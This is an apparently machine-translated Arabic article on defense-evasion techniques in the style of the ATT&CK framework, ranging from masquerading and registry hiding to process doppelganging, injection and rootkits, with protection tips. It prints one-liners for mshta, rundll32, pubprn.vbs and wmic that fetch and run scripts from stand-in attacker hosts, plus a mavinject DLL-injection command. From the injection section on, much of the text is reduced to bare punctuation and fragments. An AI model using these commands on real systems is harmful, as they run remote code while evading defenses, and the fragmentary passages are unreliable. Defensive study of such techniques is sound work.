من خلال بدء تشغيل الخدمات والشياطين وإعادة تشغيلها ، يمكن للمهاجمين تنفيذ التعليمات البرمجية وحتى تجاوز القائمة البيضاء إذا كانت launchctl عملية مصرح بها ، ومع ذلك قد يتطلب تحميل الخدمات والشياطين وخدمات التحميل والتفريغ وإعادة تشغيلها امتيازات مرتفعة.
توصيات الأمان: الحد من حقوق المستخدم لإنشاء وكلاء الإطلاق وإطلاق تشغيل Deamons باستخدام "نهج المجموعة". باستخدام تطبيق
KnockKnock ،
يمكنك اكتشاف البرامج التي تستخدم launchctl لإدارة Launch Agents و Launch Deamons.
النظام: ويندوز ، لينكس ، ماك
الوصف: يحدث التنكر عندما يتعرض اسم أو موقع الملف القابل للتنفيذ ، قانونيًا أو ضارًا ، للتلاعب والإساءات المختلفة من أجل التحايل على الحماية. العديد من خيارات التنكر معروفة.
يتمثل أحد الخيارات في وضع الملف القابل للتنفيذ في دليل مقبول عمومًا أو إعطاء اسم برنامج شرعي موثوق به. قد يكون اسم الملف مشابهاً لاسم البرنامج الشرعي. يتم استخدام طريقة التقنيع هذه لتجاوز الأدوات التي تثق في الملفات بناءً على اسم الملف أو مساره ، وكذلك لخداع مسؤولي النظام.
نوافذهناك طريقة أخرى لتعظيم استخدام المهاجم لاستخدام نسخة معدلة من أداة مساعدة شرعية ، مثل rundll32.exe. في هذه الحالة ، يمكن نقل أداة مساعدة مشروعة إلى دليل آخر وإعادة تسميتها لتجنب الكشف بناءً على مراقبة إطلاق أدوات النظام المساعدة من مواقع غير قياسية.
مثال عن سوء استخدام الدلائل الموثوق بها في Windows هو دليل C: \ Windows \ System32. يمكن تعيين أسماء الأدوات المساعدة للنظام الموثوقة مثل explorer.exe أو svchost.exe إلى الثنائيات الضارة.
لينكستتمثل الطريقة التالية في إخفاء الملفات في استخدام ملفات ثنائية ضارة تقوم ، بعد البدء ، بتغيير اسم العملية الخاصة بها إلى اسم عملية شرعية موثوقة. مثال على دليل موثوق به على Linux هو الدليل / bin ، والأسماء مثل rsyncd أو dbus-inotifier يمكن أن تكون أسماء موثوق بها.
توصيات الأمان
: عند إنشاء قواعد أمان متنوعة ، تجنب الاستثناءات بناءً على اسم الملف ومساره. تتطلب توقيع الملفات الثنائية. استخدم عناصر التحكم في الوصول إلى نظام الملفات لحماية الدلائل الموثوق بها ، مثل C: \ Windows \ System32. لا تستخدم الأدوات لتقييد تنفيذ البرامج بناءً على الاسم أو المسار إلى الملف.
حدد وحظر البرامج التي يحتمل أن تكون خطرة وخبيثة والتي قد تبدو كبرنامج شرعي.
النظام: ويندوز
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يمكن للمهاجمين تعديل السجل لإخفاء المعلومات في مفاتيح التسجيل أو لحذف المعلومات أثناء تنظيف آثار أي غزو أو في مراحل أخرى من الهجوم.
يعتمد الوصول إلى مناطق معينة من التسجيل على أذونات الحساب. يمكن استخدام الأداة المساعدة Reg المدمجة في كل من تعديل السجل المحلي والبعيدة. يمكن استخدام أدوات الوصول عن بعد الأخرى التي تتفاعل مع السجل من خلال Windows API.
قد تتضمن التغييرات التي يتم إجراؤها على السجل إجراءات لإخفاء المفاتيح ، على سبيل المثال ، عن طريق إضافة مفاتيح باسم من حرف فارغ. قراءة مثل هذا المفتاح من خلال Reg أو API سوف ينتج عنها خطأ أو سيتم تجاهله. يمكن للمهاجمين استخدام هذه المفاتيح الخفية الزائفة لإخفاء الحمولة الصافية والأوامر المستخدمة في عملية الدمج في النظام.
يمكن أيضًا تغيير سجل النظام البعيد إذا كانت خدمة التحكم عن بُعد نشطة على النظام المستهدف. عادةً ما يحتاج المهاجم أيضًا إلى بيانات اعتماد صالحة ، بالإضافة إلى الوصول إلى مشاركات مسؤول Windows لاستخدام RPC.
توصيات الحماية: يمكن أن يؤدي الإعداد غير الصحيح للأذونات في السجل إلى حقيقة أن المهاجم يمكنه تنفيذ تعليمات برمجية عشوائية (
ضعف أذونات سجل الخدمة ). تأكد من أن المستخدمين لا يمكنهم تغيير مفاتيح مكونات النظام. حظر الأدوات المساعدة للنظام غير الضرورية والبرامج الأخرى التي يمكن استخدامها لتعديل السجل. فكر في تمكين تدوين السجل (الحدث ID4657) ، ولكن ضع في اعتبارك أن تغييرات السجل التي تم إجراؤها باستخدام أدوات مثل RegHide لن يتم تسجيلها بواسطة خدمة مجموعة أحداث OS.
النظام: ويندوز
الحقوق: المستخدم
الوصف: Mshta.exe (الموجود في
C: \ Windows \ System32 \ ) هو أداة مساعدة تقوم بتشغيل تطبيقات Microsoft HTML (* .HTA). تعمل تطبيقات HTA باستخدام نفس التقنيات التي يستخدمها InternetExplorer ، ولكن خارج المستعرض. نظرًا لحقيقة أن Mshta يعالج الملفات التي تتجاوز إعدادات أمان المستعرض ، يمكن للمهاجمين استخدام mshta.exe للتوكيل لتنفيذ ملفات HTA الضارة أو Javascript أو VBScript. يمكن تشغيل الملف الضار عبر البرنامج النصي المدمج:
mshta vbscript: Close (Execute ("GetObject (" "script: https [:] // webserver / payload [.] sct" ")"))))أو مباشرة ، على URL:
mshta http [:] // webserver / payload [.] htaتوصيات الحماية: ترتبط وظيفة mshta.exe بالإصدارات الأقدم من IE التي وصلت إلى نهاية دورة حياتها. حظر Mshta.exe إذا كنت لا تستخدم وظائفه.
النظام: ويندوز
الوصف: يحتوي قسم NTFS على جدول الملفات الرئيسية (MFT) ، الذي يخزن بيانات حول محتويات وحدة التخزين ، والصفوف التي تتوافق مع الملفات ، والأعمدة الخاصة بسماتها ، بما في ذلك السمات مثل السمات الموسعة (EA) - سلسلة من 64 كيلو بايت) و التدفقات البديلة (تدفقات البيانات البديلة (ADS) - البيانات الوصفية ذات الحجم التعسفي) والتي يمكن استخدامها لتخزين أي بيانات. يمكن للمهاجمين تخزين البيانات الضارة والملفات الثنائية في السمات الموسعة وبيانات التعريف للملف. تسمح لك هذه التقنية بتجاوز بعض أدوات الحماية ، مثل أدوات المسح المستند إلى المؤشرات الثابتة وبعض أدوات مكافحة الفيروسات.
توصيات الحماية: قد يكون حظر الوصول إلى EA و ADS معقدًا وغير مناسب تمامًا ، بالإضافة إلى أنه يؤدي إلى تشغيل غير مستقر لوظائف نظام التشغيل القياسي. وجه ناقل الحماية لمنع بدء تشغيل البرنامج ، حيث يمكنك إخفاء المعلومات في EA و ADS.
النظام: ويندوز
الحقوق: المسؤول ، المستخدم
الوصف: يمكن حذف الاتصالات بمجلدات الشبكة ومشاركة مسؤول Windows إذا لم تعد مطلوبة. Net هو مثال للأداة المساعدة التي يمكن استخدامها لإزالة اتصالات الشبكة:
net use \ system \ share / delete . يمكن للمعارضين إزالة اتصالات الشبكة التي لا يحتاجون إليها لمسح آثار الاقتحام.
نصائح الأمان: اتبع أفضل الممارسات لتنظيم مشاركات مسؤول Windows. حدد الأدوات والبرامج غير الضرورية للنظام التي يمكن استخدامها للاتصال بمشاركات الشبكة والنظر في تدقيق استخدامها أو حظرها.
النظام: ويندوز ، لينكس ، ماك
الوصف: يمكن للمهاجمين استخدام التشفير والتشفير وجميع أنواع الطرق لتعتيم الملفات ومحتوياتها في النظام أو أثناء نقلها.
يمكن أرشفة الحمولات الصافية أو تشفيرها ، أحيانًا بسبب إلغاء التشويش والإطلاق اللاحق ، يلزم إجراء من المستخدم ، على سبيل المثال ، إدخال كلمة مرور لفتح أرشيف يعده مهاجم.
لإخفاء سطور النص العادي ، يمكن أيضًا تشفير أجزاء من الملفات. يمكن تقسيم الحمولات الصافية إلى ملفات "حميدة" منفصلة ، والتي ، عند تجميعها ككل ، تؤدي وظائف ضارة.
يمكن للمعارضين أيضًا تشويش الأوامر التي تم استدعاؤها من الحمولات مباشرة أو من خلال واجهة سطر الأوامر. يمكن استخدام متغيرات البيئة والأسماء المستعارة والأحرف الخاصة بدلالات النظام الأساسي أو اللغة لتجاوز اكتشاف البرامج الضارة استنادًا إلى التوقيعات والقوائم البيضاء.
مثال آخر على التشويش هو استخدام إخفاء المعلومات - تقنية إخفاء البيانات أو الكود في الصور والمسارات الصوتية وملفات الفيديو والملفات النصية.
توصيات الحماية: استخدم أدوات تحليل البرامج الضارة والكشف عنها التي لا تحقق فقط شفرة المصدر نفسها ، ولكن أيضًا تحلل عملية تنفيذ الأوامر. في Windows 10 ، يتم تقديم هذه الوظيفة كواجهة مكافحة البرامج الضارة (AMSI).
يمكن أن يؤدي وجود أحرف الهروب في الأوامر ، مثل ^ أو "، كمؤشر على التعتيم. باستخدام Windows Sysmon والحدث 4688 معرف الحدث ، يمكنك عرض وسيطات الأوامر المنفذة في عمليات مختلفة.
يمكن اكتشاف التعتيم المستخدم في الحمولات خلال مرحلة الوصول الأولي على الشبكة باستخدام نظام IDS وبوابات أمان البريد الإلكتروني التي تحدد البيانات والنصوص المضغوطة والمشفرة في الملفات المرفقة. يمكن تحديد هوية الحمولات الناقلة عبر اتصال مشفر من موقع ويب عن طريق فحص حركة المرور المشفرة.
النظام: ماك
الحقوق: المستخدم ، المسؤول
الوصف: يمكن للمهاجمين تعديل ملفات plist عن طريق تحديد الكود الخاص بهم لتنفيذها في سياق مستخدم آخر. يتم تشغيل ملفات خاصية plist الموجودة في / Library / Preferences بامتيازات مرتفعة ، ويتم تشغيل ملفات plist من ~ / Library / Preferences بامتيازات المستخدم.
تلميحات الأمان
: منع تعديل ملفات plist بجعلها للقراءة فقط.
النظام: لينكس ، ماك
الحقوق: المستخدم
الوصف: يمكن للمهاجمين استخدام طرق Port Knocking لإخفاء المنافذ المفتوحة التي يستخدمونها للاتصال بالنظام.
تلميحات
الأمان: يمكن أن يؤدي استخدام جدران الحماية الفعالة إلى منع تنفيذ بعض خيارات Port Knocking.
النظام: ويندوز
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: Transactional NTFS (TxF) هي تقنية تم تقديمها لأول مرة في نظام التشغيل Vista والتي تتيح عمليات الملفات باستخدام المعاملات. في TxF ، يمكن لوصف واحد فقط للمعاملات كتابة الملف في الوقت الحالي ، وسيتم عزل جميع الواصفات الأخرى وسيكون بمقدورها فقط قراءة إصدار الملف الذي تم إغلاقه في وقت الفتح. إذا تعطل النظام أو التطبيق ، فسوف تقوم TxF تلقائيًا بإعادة التغييرات إلى الملف. لا يزال يتم تضمين TxF في نظام التشغيل Windows 10.
تقنية معالجة Doppelganging (من الألمانية "انتقال على مرحلتين" ، "ضربة مزدوجة") ينطوي على استخدام وظائف WinAPI غير الموثقة ويتم تنفيذها في 4 خطوات:
- الصفقة يتم إنشاء معاملة NTFS باستخدام الملف القابل للتنفيذ الذي تمت مهاجمته ، ويتم إنشاء نسخة معدلة مؤقتة من الملف القابل للتنفيذ كجزء من المعاملة.
- تحميل يتم إنشاء قسم مشترك في الذاكرة حيث يتم تحميل نسخة معدلة من الملف القابل للتنفيذ.
- التراجع. يتم إرجاع المعاملة NTFS ، ونتيجة لذلك يتم حفظ الملف الذي تمت مهاجمته الأصلي على القرص في شكله الأصلي.
- الرسوم المتحركة. باستخدام نسخة معدلة من الملف القابل للتنفيذ الذي يبقى في ذاكرة الوصول العشوائي ، يتم إنشاء عملية ويبدأ تنفيذها.
وبالتالي ، ستعمل التعليمات البرمجية الضارة في سياق عملية موثوقة شرعية. بالنظر إلى أن الهجوم يحدث فقط في الذاكرة ، ل لم تكتمل معاملة NTFS ، ولكن يتم استرجاعها ، لن يبقى أي أثر للنشاط الضار على القرص.
نصائح أمنية: من المرجح أن يكون للتدابير الأمنية الوقائية التي تتخذ شكل محاولات لمنع بعض مكالمات واجهة برمجة التطبيقات آثارًا جانبية سلبية. يجب أن يكون موجه الحماية موجهاً لمنع إطلاق الأدوات الضارة في المراحل المبكرة من سلسلة الهجوم. يمكن استخدام Doppelganging للتحايل على ميزات الأمان ، ومع ذلك ، لا يزال من الممارسات الجيدة حظر التطبيقات التي يحتمل أن تكون خطرة والحد من استخدام البرنامج باستخدام القوائم البيضاء. يتم إجراء اكتشاف الهجوم من خلال تحليل المكالمات إلى وظائف CreateTransaction و CreateFileTransacted و RollbackTransaction API والوظائف غير الموثقة مثل NTCreateProcessEX و NtCreateThreadEX ومكالمات API المستخدمة لتغيير الذاكرة في عملية أخرى ، مثل WriteProcessMemory.
النظام: ويندوز
الحقوق: المستخدم
: .
.
: API . . Process Hollowing , - .
: Windows, Linux, macOS
: , , system, root
: — . , / , , . . , . .
نوافذ• DLL-. DLL (Remote thread — , ). , DLL, CreateRemoteTread, LoadLibrary .
• PE- (Portable executable injection) PE-, DLL EXE. - , .
• (Thread execution hijacking) DLL . Process Hollowing, .
• (Asynchronous Procedure Call (APC) injection) APC- (APC Queue) . APC-, « (Earle Bird injection)», APC. AtomBombing — , APC , (Global atom table).
• (Thread Local Storage (TLS) injection) PE- .
Mac Linux• LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) dlfcn (API) ( ) , API .
• Ptrace .
• /proc/[pid]/mem / , - .
• VDSO (Virtual dynamic shared object) ELF, linux-vdso.so.
, . .
: . . - , AppLocker. Yama ptrace, ptrace . , . SELinux, grsecurity, AppArmor.
النظام: Windows ، Linux ،حقوق macOS : المستخدم ، المسؤول ، وصف النظام: . , , , - . , VPN, . web-shell web-.
:راقب وجود وحظر إطلاق أدوات الوصول عن بُعد المعروفة في شبكتك (AmmyAdmin ، و Radmin ، و RemotePC ، و VNC ، وما إلى ذلك) ، واستخدم الأدوات للتحكم في تشغيل التطبيق وحظر البرامج التي قد تكون خطرة. سيؤدي إدخال أنظمة IDS و IPS التي تكشف عن برامج ضارة محددة باستخدام التواقيع إلى تقليل احتمال حدوث هجوم ناجح ، ولكن بمرور الوقت ، سوف يقوم المهاجمون بتعديل أدواتهم لتغيير التوقيع ، ونتيجة لذلك ، تجاوز أنظمة IDS و IPS.: Windows
: ,
: Regsvcs Regasm — Windows, .NET Component Object Model (COM). Microsoft. Regsvcs Regasm - , , : [ComRegisterFunction] [ComUnregisterFunction]. «» .
: Regsvcs.exe Regasm.exe .
: Windows, Linux, macOS
: , System, root
: Rootkits — , API. , , , MBR . , , , .
: - , , .
النظام: حقوق Windows :وصف المستخدم : Rundll32.exe هو أداة مساعدة لتشغيل البرامج الموجودة في المكتبات المتصلة ديناميكيًا ؛ ويمكن استدعاء الملف الثنائي الوكيل ، وتنفيذ ملفات التحكم في Windows (.cpl) من خلال وظائف shel32.dll غير الموثقة - Control_RunDLL و Control_RunDLLAsUser . يؤدي النقر المزدوج فوق ملف .cpl أيضًا إلى تنفيذ Rundll32.exe. يمكن أيضًا استخدام Rundll32 لتنفيذ البرامج النصية مثل JavaScript:rundll32.exe javascript: "\ .. \ mshtml، RunHTMLApplication"؛ document.write ()؛ GetObject ("scrirpt: https [:] // www [.] مثال [ .] com / malicious.sct ")"تم الكشف عن طريقة أعلاه لاستخدام rundll32.exe بواسطة برنامج مكافحة الفيروسات مثل فيروس مثل Poweliks.توصيات الحماية: يمكن لـ Attack Surface Reduction (ASR) في EMET و Advanced Theart Protection في Windows Defender حظر استخدام Rundll32.exe لتجاوز القائمة البيضاء.: Windows
: , System
: Windows, , . , Windows
Subject Interface Package (SIP) — , API-, , .
Trust Provider — , , .
:
- DLL FuncName CryptSIPDllGetSignedDataMsg :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\[SIP_GUID] .
DLL-, CryptSIPDllGetSignedDataMSG , . (, Microsoft ) SIP. , , , , , , , . - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData/[SIP_GUID] .
DLL-, CryptSIPDllVerifyIndirectData , , , , , (True/False). , c SIP. , DLL-. - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy/[Trust Provider GUID] .
DLL-, FinalPolicy Trust Provider, , . CryptSIPDllVerifyIndirectData, DLL-.
من المهم ملاحظة أنه يمكن تنفيذ الهجوم الموضح على آلية ثقة Windows باستخدام تقنية DLL Search Order Hijacking.توصيات الحماية: تأكد من أن مستخدمي النظام المحمي لا يمكنهم تعديل مفاتيح التسجيل المتعلقة بمكونات SIP و Trust Provider. النظر في إزالة SIPs لا لزوم لها والتي عفا عليها الزمن. استخدم جميع أنواع الوسائل لمنع تنزيل ملفات DLL الضارة ، على سبيل المثال ، تلك المضمنة في Windows AppLocker و DeviceGuard.: Windows, Linux, macOS
:: , , , , . API . Office . , . — Metasploit, Veil, PowerSploit.
تلميحات الأمان: تقييد الوصول إلى البرامج النصية مثل VBScript أو PowerShell. على Windows ، قم بتكوين إعدادات أمان MS Office عن طريق تمكين المشاهدة الآمنة وحظر الماكرو من خلال GPO. إذا كانت هناك حاجة إلى وحدات ماكرو ، فاحرص فقط على تشغيل وحدات الماكرو الموثوق بها رقمياً. استخدم التقسيم الجزئي والمحاكاة الافتراضية للتطبيق ، على سبيل المثال ، Sandboxie for Windows و Apparmor ، Docker for Linux.: Windows
:: , , Windows, . Microsoft, Windows, :
• Mavinject.exe — Windows, . Mavinject DLL :
«C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe» [PID] /INJECTRUNNING [PATH DLL];C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL];• SyncAppvPublishingServer.exe — powershell- powershell.exe.
.
: , .
: Windows
:: , , , ,
PubPrn.vbs Microsoft :
cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png: , .
: Windows
: , , . . — MPRESS UPS, , , , , . , .
:قم بتحديث أدوات الحماية من الفيروسات ، وإنشاء التواقيع المخصصة للكشف عن البرامج الضارة ، واستخدام طرق الكشف عن مجريات الأمور. تحديد ومنع البرامج التي يحتمل أن تكون خطرة.النظام: Linux ،حقوق macOS : وصف المستخدم: , . ( .app) . , Mach-O evil.bin, Terminal.app . evil.txt, . , «evil.txt » ( ), . .
:استخدام هذه التقنية من الصعب منع ل يستخدم المهاجم آليات التشغيل القياسية لنظام التشغيل ، لذلك ، يجب أن يكون متجه الحماية موجهاً لمنع الأعمال الضارة في المراحل السابقة من الهجوم ، على سبيل المثال ، في مرحلة تسليم أو إنشاء ملف ضار في النظام.النظام: Windows ،حقوق Linux : المستخدم ، المسؤول ،وصف النظام : Timestomp هو تغيير في الطوابع الزمنية للملف (التغيير ، الوصول ، الإنشاء). غالبًا ما يتم استخدام أساليب الطابع الزمني لإخفاء الملفات التي تم تعديلها أو إنشاؤها بواسطة المهاجمين بحيث لا تكون ملحوظة لخبراء الطب الشرعي وأدوات الطب الشرعي. يمكن استخدام الطابع الزمني بالاقتران مع إخفاء اسم الملف لإخفاء أدوات البرامج الضارة والمتطفلين.توصيات الحماية:قم بتوجيه ناقل الحماية لمنع بدء تشغيل البرامج التي قد تكون خطرة أو ضارة. يصف الطب الشرعي طرق تنظيم الأدوات للكشف عن تعديل الطوابع الزمنية من خلال جمع معلومات حول فتح واصف الملف ومقارنته مع الطوابع الزمنية المحددة في الملف.: Windows
:: , , - . , .
• MSBulid — , Visual Studio. XML-, . MSBuild .NET 4 C# XML-, . MSBulid.exe Microsoft.
• DNX — .Net Execution Environmant (dnx.exe) (development kit) Visual Studio Enterprise. .NET Core CLI 2016 . DNX Windows .Net Core ASP.NET Core 1.0. Dnx.exe - .
• RCSI — C#, csi.exe. Roslyn .Net. Rcsi.exe Microsoft. C# .csx Rcsi.exe Windows.
• WinDbg/CDB — MS Windows user-mode. Microsoft cdb.exe user-mode. . , - Windows. WinDbg.exe CDB.exe Microsoft .
• Tracker — tracker.exe. .NET MSBuild. Windows 10. tracker.exe DLL . Tracker.exe Microsoft.
: جميع الملفات المذكورة أعلاه قابلة للإزالة من النظام ، إذا لم يتم استخدامها للغرض المقصود من قبل المستخدمين.: , . , VPN, OWA, . , . .
توصيات الحماية: قم بتطبيق سياسة كلمة المرور ، اتبع التوصيات الخاصة بتصميم وإدارة شبكة الشركة لتقييد استخدام الحسابات المميزة على جميع المستويات الإدارية. يتحقق بانتظام من المجال والحسابات المحلية وحقوقهم من أجل تحديد تلك التي قد تسمح للمهاجمين بالوصول على نطاق واسع. مراقبة نشاط الحساب باستخدام أنظمة SIEM.: Windows
:: , Web- . Command and control (&C 2). - C2, Google Twitter. . - SSL/TLS, .
: - . IDS/IPS-, , . , C2 , . .
: Windows
:: Extensible Stylesheet Language (*.xsl), , XML-. XSL . , . (Trusted Developer Utilities), msxsl.exe, XML- (html, wml, rtf, pdf ..) JavaScript, ( URL-) XSL-. msxsl.exe , . msxsl.exe:
msxsl.exe customers[.]xml script[.]xsl .
, Squiblytwo, WMI JScript VBScript xsl-. , Squiblydoo, regsrv32.exe, Windows:
• :
wmic process list /FORMAT:evil[.]xsl;• :
wmic os get /FORMAT:«https[:]//example[.]com/evil[.]xsl».: msxsl.exe, . WMI , .